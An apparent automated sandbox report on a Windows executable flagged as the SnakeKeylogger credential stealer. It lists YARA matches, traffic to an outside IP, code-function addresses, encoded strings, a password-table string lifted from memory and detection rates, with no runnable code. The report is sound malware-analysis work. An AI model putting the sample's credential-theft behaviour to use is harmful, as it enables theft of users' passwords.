Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_01526F90	0_2_01526F90
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0152D3E4	0_2_0152D3E4
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_055869B0	0_2_055869B0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_05581BF0	0_2_05581BF0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_05580040	0_2_05580040
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_05580006	0_2_05580006
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_055869A1	0_2_055869A1
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748E6F8	0_2_0748E6F8
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748CD80	0_2_0748CD80
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07486DA8	0_2_07486DA8
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07487CB8	0_2_07487CB8
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07485B88	0_2_07485B88
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07489F70	0_2_07489F70
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07489F80	0_2_07489F80
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748E6E9	0_2_0748E6E9
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748A540	0_2_0748A540
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748A550	0_2_0748A550
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748CD6F	0_2_0748CD6F
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07488D00	0_2_07488D00
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07488D10	0_2_07488D10
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07486D98	0_2_07486D98
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748D4C0	0_2_0748D4C0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07484C99	0_2_07484C99
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07484CA8	0_2_07484CA8
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748D4B0	0_2_0748D4B0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07489B50	0_2_07489B50
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07489B60	0_2_07489B60
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07485B79	0_2_07485B79
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748A370	0_2_0748A370
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748EBC0	0_2_0748EBC0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748EBD0	0_2_0748EBD0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748A380	0_2_0748A380
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07486399	0_2_07486399
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_074863A8	0_2_074863A8
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07487BB7	0_2_07487BB7
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748D268	0_2_0748D268
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748D262	0_2_0748D262
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748D008	0_2_0748D008
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748E00A	0_2_0748E00A
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748D018	0_2_0748D018
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748E018	0_2_0748E018
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748A0E1	0_2_0748A0E1
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0748A0F0	0_2_0748A0F0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07758238	0_2_07758238
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0775822B	0_2_0775822B
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07756160	0_2_07756160
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07755D28	0_2_07755D28
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07757960	0_2_07757960
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_077558F0	0_2_077558F0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_01077118	3_2_01077118
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_0107C147	3_2_0107C147
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_01075370	3_2_01075370
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_0107D278	3_2_0107D278
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_0107C468	3_2_0107C468
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_0107C738	3_2_0107C738
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_0107E988	3_2_0107E988
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_010769A0	3_2_010769A0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_0107CA08	3_2_0107CA08
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_01079DE0	3_2_01079DE0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_0107CCD8	3_2_0107CCD8
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_0107CFAA	3_2_0107CFAA
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_01073E09	3_2_01073E09
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_0107F961	3_2_0107F961
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_0107E97A	3_2_0107E97A
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_010729E0	3_2_010729E0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A49668	3_2_06A49668
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A41FA8	3_2_06A41FA8
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A49D90	3_2_06A49D90
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A42A90	3_2_06A42A90
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A41850	3_2_06A41850
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A45148	3_2_06A45148
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4D660	3_2_06A4D660
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4D670	3_2_06A4D670
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A41F9B	3_2_06A41F9B
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4E7C0	3_2_06A4E7C0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4E7CF	3_2_06A4E7CF
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4E7D0	3_2_06A4E7D0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4DF20	3_2_06A4DF20
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4DF11	3_2_06A4DF11
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4DF1F	3_2_06A4DF1F
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A48CB1	3_2_06A48CB1
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A48CC0	3_2_06A48CC0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4F4D8	3_2_06A4F4D8
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4EC28	3_2_06A4EC28
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4EC18	3_2_06A4EC18
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A49448	3_2_06A49448
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4CDAF	3_2_06A4CDAF
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4CDC0	3_2_06A4CDC0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A49D29	3_2_06A49D29
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4DAB9	3_2_06A4DAB9
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4DAC8	3_2_06A4DAC8
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4D209	3_2_06A4D209
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4D218	3_2_06A4D218
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A40B20	3_2_06A40B20
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A40B30	3_2_06A40B30
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4E36B	3_2_06A4E36B
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4E378	3_2_06A4E378
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4F080	3_2_06A4F080
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A40007	3_2_06A40007
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4F071	3_2_06A4F071
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A40040	3_2_06A40040
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A41841	3_2_06A41841
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4F923	3_2_06A4F923
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4F930	3_2_06A4F930
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_06A4513B	3_2_06A4513B

Source: n8l3NmC5EH.exe, 00000000.00000000.1320619875.0000000000C22000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWOBv.exeB vs n8l3NmC5EH.exe
Source: n8l3NmC5EH.exe, 00000000.00000002.1350035719.0000000007F40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs n8l3NmC5EH.exe
Source: n8l3NmC5EH.exe, 00000000.00000002.1334763772.000000000330B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs n8l3NmC5EH.exe
Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs n8l3NmC5EH.exe
Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs n8l3NmC5EH.exe
Source: n8l3NmC5EH.exe, 00000000.00000002.1334071497.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs n8l3NmC5EH.exe
Source: n8l3NmC5EH.exe, 00000003.00000002.3794458044.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs n8l3NmC5EH.exe
Source: n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs n8l3NmC5EH.exe
Source: n8l3NmC5EH.exe	Binary or memory string: OriginalFilenameWOBv.exeB vs n8l3NmC5EH.exe

Source: n8l3NmC5EH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: n8l3NmC5EH.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, -A.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, -A.cs

Base64 encoded string: 'rFj51hzTeDKXAHk4x2M7Rn97FogUA8nI3ZaQ8vHDilMhMV3gp+As5w==', 'Spm992E313fSbY5NiAI++96f46zzQ4rWZMrJrVgeO2ZPAMMyJRZuntKcMKKK3uV2'

Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, ECwjKMMNiOdRA7uAlg.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, ECwjKMMNiOdRA7uAlg.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, ECwjKMMNiOdRA7uAlg.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, ECwjKMMNiOdRA7uAlg.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, ECwjKMMNiOdRA7uAlg.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, ECwjKMMNiOdRA7uAlg.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, M9eYWDI95I4qYnEqnl.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, M9eYWDI95I4qYnEqnl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, M9eYWDI95I4qYnEqnl.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, M9eYWDI95I4qYnEqnl.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, M9eYWDI95I4qYnEqnl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, M9eYWDI95I4qYnEqnl.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, M9eYWDI95I4qYnEqnl.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, M9eYWDI95I4qYnEqnl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, M9eYWDI95I4qYnEqnl.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/1@3/3

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\n8l3NmC5EH.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe

Mutant created: NULL

Source: n8l3NmC5EH.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: n8l3NmC5EH.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: n8l3NmC5EH.exe	Virustotal: Detection: 75%
Source: n8l3NmC5EH.exe	ReversingLabs: Detection: 73%

Source: unknown	Process created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"
